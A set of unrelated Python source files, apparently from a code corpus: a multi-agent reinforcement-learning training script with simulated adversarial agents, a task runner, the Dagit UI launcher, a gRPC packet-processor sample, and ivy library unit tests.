n_t_agents, args.n_batches
))
grad_norms_min = np.zeros((
n_t_agents, 1
))
grad_norms_max = np.zeros((
n_t_agents, 1
))
qval_trains_l = np.zeros((
n_t_agents, 2
))
qval_targets_l = np.zeros((
n_t_agents, 2
))
for i, a in enumerate(agents):
error_a[i, :] = errors[i]
for t in range(args.T):
rewards[i, t, :] = a.rewards[t]
grad_norms_min[i, 0] = np.min(grad_norms[i])
grad_norms_max[i, 0] = np.max(grad_norms[i])
qval_trains_l[i, :] = qval_trains[i][0, :]
qval_targets_l[i, :] = qval_targets[i][0, :]
m_reward = np.mean(rewards)
m_reward_terminal = np.mean(rewards[:, -1, :])
m_errors = np.mean(error_a)
self.episode_rewards[a_type].append(m_reward)
self.terminal_rewards[a_type].append(m_reward_terminal)
self.bellman_errors[a_type].append(m_errors)
self.grad_norm_min_logs[a_type].append(grad_norms_min)
self.grad_norm_max_logs[a_type].append(grad_norms_max)
self.qval_trains_log[a_type].append(qval_trains_l)
self.qval_targets_log[a_type].append(qval_targets_l)
if (
len(self.episode_rewards[a_type]) % self.average_window == 0 and
len(self.episode_rewards[a_type]) != 0
):
self.mean_episode_reward[a_type].append(
np.mean(self.episode_rewards[a_type][-self.average_window:])
)
self.mean_terminal_reward[a_type].append(
np.mean(self.terminal_rewards[a_type][-self.average_window:])
)
self.mean_bellman_errors[a_type].append(
np.mean(self.bellman_errors[a_type][-self.average_window:])
)
def log(self, agents, errors, grad_norms, qval_trains, qval_targets,
total_time, q_agents, iteration, args):
a_types = list(set([a.a_type for a in agents]))
for a_type in a_types:
self.log_type(a_type, agents, errors, grad_norms, qval_trains, qval_targets,
total_time, q_agents, iteration, args)
if iteration % self.print_every == 0 and iteration != 0:
if not isinstance(q_agents, dict):
learning_rate = q_agents.optimizer_spec.lr_schedule.value(
total_time)
exploration_rate = q_agents.exploration.value(total_time)
else:
learning_rate = list(q_agents.values())[0].optimizer_spec.lr_schedule.value(
total_time)
exploration_rate = list(q_agents.values())[0].exploration.value(total_time)
print('Iteration %d' % iteration)
for a_type in a_types:
print('mean reward of type %s (%d episodes) %f' % (
a_type, self.average_window, self.mean_episode_reward[a_type][-1]))
print('mean terminal reward of type %s (%d episodes) %f' % (
a_type, self.average_window, self.mean_terminal_reward[a_type][-1]
))
print('mean bellman error of type %s (%d episodes) %f' % (
a_type, self.average_window, self.mean_bellman_errors[a_type][-1]
))
print('Learning rate %f' % learning_rate)
print('Exploration rate %f' % exploration_rate)
with open(self.log_file, 'wb') as f:
pickle.dump([
self.episode_rewards, self.terminal_rewards, self.bellman_errors,
self.grad_norm_min_logs, self.grad_norm_max_logs,
self.qval_trains_log, self.qval_targets_log,
self.test_rewards, self.test_action_signal_corr, self.test_action_accuracy
], f, pickle.HIGHEST_PROTOCOL)
def test_log(self, test_reward, action_signal_correlation, accuracy):
for a_type in test_reward:
self.test_rewards[a_type].append(test_reward[a_type])
self.test_action_signal_corr[a_type].append(
action_signal_correlation[a_type]
)
self.test_action_accuracy[a_type].append(
accuracy[a_type]
)
def make_csv_log(rews, arec, env, save_path, fname):
T = len(rews)
n_agents = len(rews[0])
n_batches = rews[0][0].shape[0]
# Structure
# t, Batch, Agent, Attack, Attack_mode, Signal, World, Action, Reward
output = {
'batch' : [],
't' : [],
'agent' : [],
'world' : [],
'attack_mode' : [],
'attack' : [],
'bias' : [],
'signal' : [],
'action' : [],
'reward' : []
}
for t in range(T):
for a in range(n_agents):
for b in range(n_batches):
if env.attack:
attack = 1 if a in env.attack_idx[b, :] else 0
attack_mode = 1
else:
attack = 0
attack_mode = 0
signal = env.signals[b, a]
world = env.world[b, 0]
bias = env.bias_per_agent if attack == 1 else 0
action = arec[t][a][b]
reward = rews[t][a][b]
output['t'].append(t)
output['batch'].append(b)
output['agent'].append(a)
output['world'].append(world)
output['attack_mode'].append(attack_mode)
output['attack'].append(attack)
output['signal'].append(signal)
output['action'].append(action)
output['reward'].append(reward)
output['bias'].append(bias)
df = pd.DataFrame(output)
df.sort_values(by=['batch', 't', 'agent'], inplace=True)
df.to_csv(save_path + fname, index=False)
def run_test(sess, log, iteration, total_time, q_agents, agents,
env, args, save_path='', fname='', do_save=False):
def print_test_summary(rews):
rewards = []
rewards_sd = []
rewards_min = []
rewards_max = []
for rew in rews:
rw = np.zeros((len(rew), len(rew[0])))
for j in range(len(rew)):
rw[j, :] = rew[j]
rewards.append(np.mean(rw))
rewards_sd.append(np.std(rw))
rewards_min.append(np.min(rw))
rewards_max.append(np.max(rw))
mean_test_reward = np.mean(rewards)
print('========================================')
print('Testing at iteration %d' % iteration)
print('Test terminal reward (%d batches) %f +- %f' %(
args.n_batches, rewards[-1], rewards_sd[-1]))
print('Test terminal reward (%d batches) max %f, min %f' %(
args.n_batches, rewards_max[-1], rewards_min[-1]))
print('Test total reward (%d batches) %f' %(
args.n_batches, mean_test_reward))
print('========================================')
return rewards[-1]
rews, arec, signals_rec, env_res = run_episode(
sess, log, iteration, total_time, q_agents, agents, env, args,
test=True
)
rewards_last_T = {}
action_signal_correlation = {}
accuracy = {}
for a_type in rews:
print('========================================')
print('Test for type %s' % a_type)
rT = print_test_summary(rews[a_type])
rewards_last_T[a_type] = rT
ac = arec[a_type][0][0]
si = signals_rec[a_type][0][0]
action_signal_correlation[a_type] = np.corrcoef(
ac, si
)[0, 1]
accuracy[a_type] = (ac == env_res.world[:, 0]).mean()
if do_save:
if args.attack:
fname += '_attack_mode_n_attack_%d_bias_%f'%(args.n_attack, args.bias_per_agent)
with open(save_path + fname, 'wb') as f:
pickle.dump([rews, arec, signals_rec], f, pickle.HIGHEST_PROTOCOL)
if args.eval_save_csv:
make_csv_log(rews, arec, env, save_path, fname + '_full_log.csv')
return rewards_last_T, action_signal_correlation, accuracy
def split_by_type(l, agents, is_signal=False):
a_types = list(set([a.a_type for a in agents]))
d = {}
for t in a_types:
d[t] = []
for i, a in enumerate(agents):
if is_signal:
d[a.a_type].append(l[:, i])
else:
d[a.a_type].append(l[i])
return d
def run_episode(sess, log, iteration, total_time, q_agents, agents, env, args,
test=False):
obs = env.reset()
for i, a in enumerate(agents):
if env.attack:
if i in env.attack_idx:
a.reset(env.signals[:, i], q_agents['attacker'], 'attacker')
else:
a.reset(env.signals[:, i], q_agents['citizen'], 'citizen')
else:
a.reset(env.signals[:, i], q_agents['citizen'], 'citizen')
a_types = list(set([a.a_type for a in agents]))
def make_dict():
d = {}
for t in a_types:
d[t] = []
return d
rews = make_dict()
arec = make_dict()
signals_rec = make_dict()
for t in range(args.T):
for i, a in enumerate(agents):
a.observe_act(obs[i])
actions = []
for i, a in enumerate(agents):
ids = [a.agent_id for j in range(args.n_batches)]
action = a.q_agent.take_action(
sess, a.act_obs,
a.signal, ids, t,
total_time, args.n_batches, test, env.world
)
if args.attack and args.random_attacker and a.a_type == 'attacker':
action = np.random.randint(0, args.num_actions - 1, size=args.n_batches)
actions.append(action)
a.record_act_taken(action)
obs, rewards = env.step(actions)
signals = env.signals
rewards_split_types = split_by_type(rewards, agents)
actions_split_types = split_by_type(actions, agents)
signals_split_types = split_by_type(signals, agents, is_signal=True)
for a_type in a_types:
rews[a_type].append(rewards_split_types[a_type])
arec[a_type].append(actions_split_types[a_type])
signals_rec[a_type].append(signals_split_types[a_type])
for i, a in enumerate(agents):
# NOTE: this is not used in learning! Only for record keeping.
a.observe_reward(rewards[i])
if not test:
errors = []
grad_norms = []
qval_trains = []
qval_targets = []
for i, a in enumerate(agents):
ids = [a.agent_id for j in range(args.n_batches)]
error, grad_norm, qval_train, qval_target = a.q_agent.update(env,
sess, a.act_obs, a.act_taken,
a.signal, ids, a.rewards,
total_time, iteration, env.world
)
errors.append(error)
grad_norms.append(grad_norm)
qval_trains.append(qval_train[0])
qval_targets.append(qval_target[0])
log.log(agents, errors, grad_norms, qval_trains, qval_trains,
total_time, q_agents, iteration, args)
total_time += args.T
return total_time
else:
return rews, arec, signals_rec, env
def train_or_eval(args):
RESTORE = False
EVALUATE = False
EVALUATE_SAVE_CSV = False
if args.restore:
RESTORE = args.restore
restore_file = args.restore_file
restore_id = args.restore_run_id
EVALUATE = args.evaluate
n_batch_eval = args.n_batches_evaluation
EVALUATE_SAVE_CSV = args.eval_save_csv
if not RESTORE:
run_id = id_generator()
log_file = args.log_path + run_id
arg_file = args.log_path + 'args_' + run_id
with open(arg_file, 'wb') as f:
pickle.dump(args, f, pickle.HIGHEST_PROTOCOL)
else:
run_id = restore_id
log_file = args.log_path + run_id +'_tmp'
arg_file = args.log_path + 'args_' + run_id
ATTACK = args.attack
N_ATTACK = args.n_attack
BIAS_PER_AGENT = args.bias_per_agent
EVAL_SAVE_PATH = args.eval_path
SAVE_PATH = args.save_path
LOG_PATH = args.log_path
with open(arg_file, 'rb') as f:
args = pickle.load(f)
if ATTACK:
print('Setting attack parameters!')
args.attack = ATTACK
args.n_attack = N_ATTACK
args.bias_per_agent = BIAS_PER_AGENT
else:
args.attack = ATTACK
args.eval_save_csv = EVALUATE_SAVE_CSV
args.eval_path = EVAL_SAVE_PATH
args.save_path = SAVE_PATH
args.log_path = LOG_PATH
args.network_path = osp.join(
osp.abspath(osp.join('../..')),
args.network_path)
print(args.network_file)
args.save_path = osp.join(
args.save_path, run_id)
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
env = envim.env_adv(args)
args_test = deepcopy(args)
if not EVALUATE:
args_test.n_batches = args_test.n_batches_test
else:
args_test.n_batches = n_batch_eval
env_test = envim.env_adv(args_test)
log = logger(args.average_window, args.print_every, log_file, ['citizen', 'attacker'])
sess = get_session()
set_global_seeds(args.seed)
if args.optimizer == 'RMSProp':
my_optimizer = RMSPropOptimizer(learning_rate=args.learning_rate,
momentum=args.momentum)
elif args.optimizer == 'Adam':
my_optimizer = AdamOptimizer(learning_rate=args.learning_rate)
else:
raise ValueError(
'Must provide a valid optimizer.'
)
if args.exploration_schedule == 'constant':
my_exploration_schedule = constant_exploration_schedule(
constant_rate=args.exploration_rate)
elif args.exploration_schedule == 'piece_wise_linear':
my_exploration_schedule = piecewise_exploration_schedule(900000,
limit_rate=args.exploration_rate)
else:
raise ValueError(
'Must provide a valid exploration schedule.'
)
q_agents = {}
q_agents['citizen'] = qa.q_agent(
args.num_actions, args.n_agents, args.T, args.gamma,
my_optimizer,
my_exploration_schedule,
args.target_reset,
args.n_hidden,
'q_func_train_citizen',
'q_func_target_citizen',
grad_norm_clipping=args.grad_norm_clipping, reuse=False, double_q=args.double_q,
n_layers=args.n_layers)
q_agents['attacker'] = qa.q_agent(
args.num_actions, args.n_agents, args.T, args.gamma,
my_optimizer,
my_exploration_schedule,
args.target_reset,
args.n_hidden,
'q_func_train_attack',
'q_func_target_attack',
grad_norm_clipping=args.grad_norm_clipping, reuse=False, double_q=args.double_q,
n_layers=args.n_layers)
global_step = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')
saver = tf.train.Saver(max_to_keep=args.max_to_keep)
agents = []
for i in range(args.n_agents):
agents.append(agent_data.agent_data(i))
sess.run(tf.initializers.global_variables())
best_n_rewards = [0]
if RESTORE:
restore_path = osp.join(args.save_path, restore_file)
saver.restore(sess, restore_path)
if not EVALUATE:
total_time = 0
for it in range(args.n_iterations):
total_time = run_episode(
sess, log, it, total_time, q_agents, agents, env, args
)
sess.run(global_step.assign_add(1))
if not args.save_regularly:
if (it + 1) % 100 == 0:
test_reward, action_signal_correlation, accuracy = run_test(
sess, log, it, total_time, q_agents, agents,
env_test, args_test
)
log.test_log(test_reward, action_signal_correlation, accuracy)
if test_reward['citizen'] > np.min(best_n_rewards):
if len(best_n_rewards) < args.max_to_keep:
best_n_rewards.append(test_reward['citizen'])
else:
min_r = np.min(best_n_rewards)
best_n_rewards = [x for x in best_n_rewards if x != min_r]
best_n_rewards.append(test_reward['citizen'])
saver.save(sess,
osp.join(args.save_path, run_id + '_sess_chkpt_best_reward_%f'%test_reward['citizen']),
global_step=global_step)
print('Current best reward = %s' % best_n_rewards)
else:
if (it + 1) % args.test_freq == 0:
test_reward, action_signal_correlation, accuracy = run_test(
sess, log, it, total_time, q_agents, agents,
env_test, args_test
)
log.test_log(test_reward, action_signal_correlation, accuracy)
if (it + 1) % args.checkpt_freq == 0:
saver.save(sess,
osp.join(args.save_path, run_id + '_sess_chkpt_iteration_%d'%it),
global_step=global_step)
else:
eval_save_path = args.eval_path
fname = run_id + '_eval'
test_reward, _, _ = run_test(
sess, log, 0, 0, q_agents, agents,
env_test, args_test, save_path=eval_save_path,
fname=fname, do_save=True
)
for a_type in test_reward:
print('evaluating, type %s, reward = %f' % (a_type, test_reward[a_type]))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# NETWORK ARCHITECTURE PARAMETERS
parser.add_argument('-n_hidden', help='GRU and fully connected hidden units', type=int, default=64)
parser.add_argument('-n_layers', help='number of GRU layers', type=int, default=2)
# LEARNING PARAMETERS
parser.add_argument('-seed', help='global seed', type=int, default=5)
parser.add_argument('-learning_rate', help='learning rate', type=float, default=5e-4)
parser.add_argument('-momentum', help='momentum for RMSProp', type=float, default=0.05)
parser.add_argument('-optimizer', help='which optimizer to use', type=str, default='RMSProp')
parser.add_argument('-exploration_rate', help='exploration rate', type=float, default=0.05)
parser.add_argument('-exploration_schedule', help='exploration schedule to use',
type=str, default='constant')
parser.add_argument('-grad_norm_clipping', help='max gradient norm to clip to', type=float, default=10.)
parser.add_argument('-target_reset', help='dqn reset frequency', type=int, default=100)
parser.add_argument('-n_iterations', help='number of training episodes', type=int, default=12000)
parser.add_argument('-n_batches', help='number of batches', type=int, default=256)
parser.add_argument('-n_batches_test', help='number of batches for testing during training',
type=int, default=2000)
parser.add_argument('-n_batches_evaluation',
help='number of batches for testing during evaluation post traing',type=int, default=10000)
parser.add_argument('-double_q', help='do doubel q learning', action="store_true")
parser.add_argument('-n_experiments', help='number of experiments to run in parallel', type=int, default=1)
# GAME PARAMETERS
parser.add_argument('-num_actions', help='number of actions', type=int, default=2)
parser.add_argument('-n_states', help='number of states', type=int, default=2)
parser.add_argument('-n_agents', help='number of agents', type=int, default=10)
parser.add_argument('-var', help='variance of signal', type=float, default=1.)
parser.add_argument('-T', help='number of time steps', type=int, default=10)
parser.add_argument('-gamma', help='discount factor', type=float, default=0.99)
parser.add_argument('-network_path', help='location of network file', default='social_network_files/')
parser.add_argument('-network_file', help='network file', default='social_network_complete.txt')
parser.add_argument('-attack', help='whether to run in attack mode', action="store_true")
parser.add_argument('-n_attack', help='number of nodes to attack', type=int, default=1)
parser.add_argument('-bias_per_agent', help='attack bias per agent', type=float, default=3.)
parser.add_argument('-random_attacker', help='if random attacker should be used instead of trained attacker', action="store_true")
# LOGGING PARAMTERS
parser.add_argument('-print_every', help='reward printing interval', type=int, default=100)
parser.add_argument('-average_window', help='reward averaging interval', type=int, default=100)
parser.add_argument('-log_path', help='location of log file', default='log/')
parser.add_argument('-save_path', help='location of model checkpoints', default='checkpoints/')
parser.add_argument('-max_to_keep', help='number of models to save', type=int, default=5)
parser.add_argument('-code_version', help='git version of code', default='no_version')
parser.add_argument('-experiment_name', help='name of experiment for easy identification', default='no_name')
parser.add_argument('-save_regularly', help='whether to save model checkpoints at regular intervals', action='store_true')
parser.add_argument('-checkpt_freq', help='frequency of model checkpoints under regular saving', type=int, default=100)
parser.add_argument('-test_freq', help='frequency to run test', type=int, default=5)
# RESTORE AND EVALUATE PARAMETERS
parser.add_argument('-restore', help='restore best saved model', action="store_true")
parser.add_argument('-restore_run_id', help='id of run to restore', type=str, default='')
parser.add_argument('-restore_file', help='file of run to restore', type=str, default='')
parser.add_argument('-evaluate', help='evaluate a saved model', action="store_true")
parser.add_argument('-eval_path', help='location of evaluation output', default='evaluation/')
parser.add_argument('-eval_save_csv', help='save evaluated model output as csv', action="store_true")
parser.add_argument('-time_stamp', help='time stamp to recover', default='no_time_stamp')
parser.add_argument('-load_old_format', help='load files in old folder structure', action="store_true")
args = parser.parse_args()
# add code version number
try:
repo = git.Repo(search_parent_directories=True)
args.code_version = repo.head.object.hexsha
except:
args.code_version = '0'
print('===================================================')
print('USING PARAMETERS')
print(args)
print('===================================================')
if not args.evaluate:
if not args.restore:
exp_path = args.experiment_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
args.save_path = osp.join(
osp.abspath(osp.join('../..')), 'results', exp_path,
args.save_path)
args.log_path = osp.join(
osp.abspath(osp.join('../..')), 'results', exp_path,
args.log_path)
if not os.path.exists(args.log_path):
os.makedirs(args.log_path)
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
processes = []
args.n_experiments = min(args.n_experiments, max(mult.cpu_count() - 1, 1))
print('Running a total of %d experiments in parallel.' % args.n_experiments)
for e in range(args.n_experiments):
seed = args.seed + 10*e
args_run = deepcopy(args)
args_run.seed = seed
print('Running experiment with seed %d'%seed)
def train_func():
train_or_eval(args_run)
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
for p in processes:
p.join()
else:
if not args.load_old_format:
exp_path = args.experiment_name
args.save_path = osp.join(
osp.abspath(osp.join('../..')), 'results', exp_path,
args.save_path)
args.log_path = osp.join(
osp.abspath(osp.join('../..')), 'results', exp_path,
args.log_path)
args.eval_path = osp.join(
osp.abspath(osp.join('../..')), 'results', exp_path,
args.eval_path)
if not os.path.exists(args.eval_path):
os.makedirs(args.eval_path)
else:
args.save_path = osp.join(
osp.abspath(osp.join('../..')),
args.save_path)
args.log_path = osp.join(
osp.abspath(osp.join('../..')),
args.log_path)
args.eval_path = osp.join(
osp.abspath(osp.join('../..')),
args.eval_path)
if not os.path.exists(args.eval_path):
os.makedirs(args.eval_path)
train_or_eval(args)
|
__init__.py | import time
import importlib
import traceback
from threading import Thread
import task.services.task as task
from task.services.TaskLog import *
from config import *
def monitor_infinite():
print("Starting Task Runner ...")
while True:
monitor_once()
time.sleep(5) # loop every 5s
# Monitor Task and run inifitely to process the task
def monitor_once():
instances = []
# Any Task waiting?
import socket
hostname = socket.gethostname()
# trigger schedule tasks
task.trigger_scheduled_tasks()
# get waiting instances
instances.extend(task.waiting_tasks(hostname))
# Run Task
for instance in instances:
print("[{}] * New task found [{}]: {}".format(
now(), instance['id'], instance['task']['name'])
)
thread = Thread(target = run_task, args = (instance,))
thread.start()
# Run Task - this should be thread
def run_task(instance):
task_successful = True
# Set instance "RUNNING"
task.status(instance, "RUNNING")
# set instance started time
task.started(instance)
# Get List of action
actions = task.actions(instance['task_id'])
for action in actions:
print("[{}] Action: {}".format(now(), action['name']))
log = TaskLog(HOST, task, instance, action)
# prepare parameters
p = {
'instance': instance,
'action': action,
'log': log
}
# run task
task_module_path = "task.modules.{}".format(action['module']['name'])
module = importlib.import_module(task_module_path)
try:
task_successful = module.run(p)
if not task_successful and action['stop'] != "No":
log.info("stopped - {}".format(action['name']))
break
except Exception, e:
print(e.message)
print(traceback.format_exc())
log.error("action failed: {}".format(action['name']), e)
# Set instance "RUNNING"
if task_successful:
task.status(instance, "COMPLETED")
else:
task.status(instance, "ERROR")
# set instance finished time
task.finished(instance)
# instead of using dateformat thingy all the time
def now():
return time.strftime('%Y-%m-%d %H:%M:%S')
|
cli.py | import os
import sys
import tempfile
import threading
from contextlib import contextmanager
import click
import six
from dagster import check
from dagster.cli.workspace import Workspace, get_workspace_from_kwargs, workspace_target_argument
from dagster.cli.workspace.cli_target import WORKSPACE_TARGET_WARNING
from dagster.core.instance import DagsterInstance
from dagster.core.telemetry import (
START_DAGIT_WEBSERVER,
log_action,
log_workspace_stats,
upload_logs,
)
from dagster.utils import DEFAULT_WORKSPACE_YAML_FILENAME
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from .app import create_app_from_workspace
from .version import __version__
def create_dagit_cli():
return ui # pylint: disable=no-value-for-parameter
DEFAULT_DAGIT_HOST = "127.0.0.1"
DEFAULT_DAGIT_PORT = 3000
DEFAULT_DB_STATEMENT_TIMEOUT = 5000 # 5 sec
@click.command(
name="ui",
help=(
"Run dagit. Loads a repository or pipeline.\n\n{warning}".format(
warning=WORKSPACE_TARGET_WARNING
)
+ (
"\n\nExamples:"
"\n\n1. dagit (works if .{default_filename} exists)"
"\n\n2. dagit -w path/to/{default_filename}"
"\n\n3. dagit -f path/to/file.py"
"\n\n4. dagit -f path/to/file.py -d path/to/working_directory"
"\n\n5. dagit -m some_module"
"\n\n6. dagit -f path/to/file.py -a define_repo"
"\n\n7. dagit -m some_module -a define_repo"
"\n\n8. dagit -p 3333"
"\n\nOptions can also provide arguments via environment variables prefixed with DAGIT"
"\n\nFor example, DAGIT_PORT=3333 dagit"
).format(default_filename=DEFAULT_WORKSPACE_YAML_FILENAME)
),
)
@workspace_target_argument
@click.option(
"--host",
"-h",
type=click.STRING,
default=DEFAULT_DAGIT_HOST,
help="Host to run server on",
show_default=True,
)
@click.option(
"--port",
"-p",
type=click.INT,
help="Port to run server on, default is {default_port}".format(default_port=DEFAULT_DAGIT_PORT),
)
@click.option(
"--path-prefix",
"-l",
type=click.STRING,
default="",
help="The path prefix where Dagit will be hosted (eg: /dagit)",
show_default=True,
)
@click.option(
"--storage-fallback",
help="Base directory for dagster storage if $DAGSTER_HOME is not set",
default=None,
type=click.Path(),
)
@click.option(
"--db-statement-timeout",
help="The timeout in milliseconds to set on database statements sent "
"to the DagsterInstance. Not respected in all configurations.",
default=DEFAULT_DB_STATEMENT_TIMEOUT,
type=click.INT,
show_default=True,
)
@click.version_option(version=__version__, prog_name="dagit")
def ui(host, port, path_prefix, storage_fallback, db_statement_timeout, **kwargs):
# add the path for the cwd so imports in dynamically loaded code work correctly
sys.path.append(os.getcwd())
if port is None:
port_lookup = True
port = DEFAULT_DAGIT_PORT
else:
port_lookup = False
if storage_fallback is None:
with tempfile.TemporaryDirectory() as storage_fallback:
host_dagit_ui(
host,
port,
path_prefix,
storage_fallback,
db_statement_timeout,
port_lookup,
**kwargs,
)
else:
host_dagit_ui(
host, port, path_prefix, storage_fallback, db_statement_timeout, port_lookup, **kwargs
)
def host_dagit_ui(
host, port, path_prefix, storage_fallback, db_statement_timeout, port_lookup=True, **kwargs
):
with DagsterInstance.get(storage_fallback) as instance:
# Allow the instance components to change behavior in the context of a long running server process
instance.optimize_for_dagit(db_statement_timeout)
with get_workspace_from_kwargs(kwargs) as workspace:
if not workspace:
raise Exception("Unable to load workspace with cli_args: {}".format(kwargs))
host_dagit_ui_with_workspace(instance, workspace, host, port, path_prefix, port_lookup)
def host_dagit_ui_with_workspace(instance, workspace, host, port, path_prefix, port_lookup=True):
check.inst_param(instance, "instance", DagsterInstance)
check.inst_param(workspace, "workspace", Workspace)
log_workspace_stats(instance, workspace)
app = create_app_from_workspace(workspace, instance, path_prefix)
start_server(instance, host, port, path_prefix, app, port_lookup)
@contextmanager
def uploading_logging_thread():
stop_event = threading.Event()
logging_thread = threading.Thread(
target=upload_logs, args=([stop_event]), name="telemetry-upload"
)
try:
logging_thread.start()
yield
finally:
stop_event.set()
logging_thread.join()
def start_server(instance, host, port, path_prefix, app, port_lookup, port_lookup_attempts=0):
server = pywsgi.WSGIServer((host, port), app, handler_class=WebSocketHandler)
print( # pylint: disable=print-call
"Serving on http://{host}:{port}{path_prefix} in process {pid}".format(
host=host, port=port, path_prefix=path_prefix, pid=os.getpid()
)
)
log_action(instance, START_DAGIT_WEBSERVER)
with uploading_logging_thread():
try:
server.serve_forever()
except OSError as os_error:
if "Address already in use" in str(os_error):
if port_lookup and (
port_lookup_attempts > 0
or click.confirm(
(
"Another process on your machine is already listening on port {port}. "
"Would you like to run the app at another port instead?"
).format(port=port)
)
):
port_lookup_attempts += 1
start_server(
instance,
host,
port + port_lookup_attempts,
path_prefix,
app,
True,
port_lookup_attempts,
)
else:
six.raise_from(
Exception(
(
"Another process on your machine is already listening on port {port}. "
"It is possible that you have another instance of dagit "
"running somewhere using the same port. Or it could be another "
"random process. Either kill that process or use the -p option to "
"select another port."
).format(port=port)
),
os_error,
)
else:
raise os_error
cli = create_dagit_cli()
def main():
# click magic
cli(auto_envvar_prefix="DAGIT") # pylint:disable=E1120
|
samplepacketprocessor.py | import grpc
import EventNotificationProto_pb2
import ServicesProto_pb2_grpc
import threading
from ryu.lib.packet import packet
import array
# A Simple packet processor.
def packetprocessor():
channel = grpc.insecure_channel('localhost:50051')
eventNotificationStub = ServicesProto_pb2_grpc.EventNotificationStub(channel)
request = EventNotificationProto_pb2.RegistrationRequest(clientId = "packet_processor_python")
topic = EventNotificationProto_pb2.Topic(clientId = "packet_processor_python"
, type = 0)
# Register to PACKET_EVENT
response = eventNotificationStub.register(request)
eventObserver = eventNotificationStub.onEvent(topic)
for event in eventObserver:
pktContext = event.packetContext
if pktContext is None:
return
inboundPkt = pktContext.inboundPacket
pkt = packet.Packet(inboundPkt.data)
for p in pkt:
if type(p)!= str:
if p.protocol_name == "ipv4":
print("An IPv4 packet has been received")
while True:
continue
if __name__ == '__main__':
t = threading.Thread(target=packetprocessor)
t.start()
|
test_general.py | """
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
# def test_get_referrers_recursive(dev, call):
#
# class SomeClass:
# def __init__(self):
# self.x = [1, 2]
# self.y = [self.x]
#
# some_obj = SomeClass()
# refs = ivy.get_referrers_recursive(some_obj.x)
# ref_keys = refs.keys()
# assert len(ref_keys) == 3
# assert 'repr' in ref_keys
# assert refs['repr'] == '[1,2]'
# y_id = str(id(some_obj.y))
# y_refs = refs[y_id]
# assert y_refs['repr'] == '[[1,2]]'
# some_obj_dict_id = str(id(some_obj.__dict__))
# assert y_refs[some_obj_dict_id] == 'tracked'
# dict_refs = refs[some_obj_dict_id]
# assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
# some_obj_id = str(id(some_obj))
# some_obj_refs = dict_refs[some_obj_id]
# assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
# assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
# mxnet does not support int16, and does not support bool for broadcast_equal method used
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
